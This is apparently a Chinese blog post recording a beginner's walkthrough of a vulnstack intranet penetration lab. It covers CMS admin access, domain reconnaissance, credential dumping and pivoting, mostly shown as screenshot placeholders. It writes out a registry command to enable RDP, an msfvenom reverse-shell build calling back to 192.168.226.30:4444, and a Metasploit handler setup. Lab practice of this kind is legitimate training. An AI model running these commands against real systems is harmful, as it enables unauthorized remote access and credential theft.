内网渗透靶机演练

靶场: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

参考: https://www.anquanke.com/post/id/189940

第一次做关于内网渗透的靶场所以记录一下,靶场还没完成(太菜了)。。。。。。

入侵服务器

http://192.168.226.31/yxcms/index.php?r=admin

image.png

image.png

image.png

查看当前权限

image.png

查看3389端口是否开启

image.png

开启3389端口

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

image.png

image.png

添加一个用户

image.png

image.png

远程登录

image.png

内网信息收集

net view /domain 查询域列表

image.png

查询同域的机器

image.png

判断主域

image.png

获取域控的IP地址

域中其他主机IP地址

image.png

image.png

查询域用户

image.png

制作反弹shell

这里请制作32的shell,64为连接不稳定

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.226.30 lport=4444 -f exe -o shell.exe

image.png

蚁剑文件上传

image.png

进入msf命令行

image.png

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.226.30
lhost => 192.168.226.30
msf5 exploit(multi/handler) > set lport 4444
lport => 4444
msf5 exploit(multi/handler) > exploit

image.png

获取system权限

image.png

获取hash

image.png

获取明文密码

image.png

image.png

添加路由表来跨域攻击

即所有对74网段的攻击流量都通过已渗透的这台目标主机的meterpreter会话来传递

image.png

设置代理

image.png

看主机3389端口是否开启

image.png

给域成员添加用户

image.png

使用ew制作内网代理

image.png

使用代理后的msf攻击域成员

image.png

还有很多地方需要深入了解,努力学习!!!

posted @   JKding233  阅读(2567)  评论(0编辑  收藏  举报
编辑推荐:
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
· 基于Microsoft.Extensions.AI核心库实现RAG应用
· Linux系列:如何用heaptrack跟踪.NET程序的非托管内存泄露
· 开发者必知的日志记录最佳实践
· SQL Server 2025 AI相关能力初探
阅读排行:
· winform 绘制太阳,地球,月球 运作规律
· 震惊!C++程序真的从main开始吗?99%的程序员都答错了
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· 超详细:普通电脑也行Windows部署deepseek R1训练数据并当服务器共享给他人
· 上周热点回顾(3.3-3.9)
点击右上角即可分享
微信分享提示
AI IDE Trae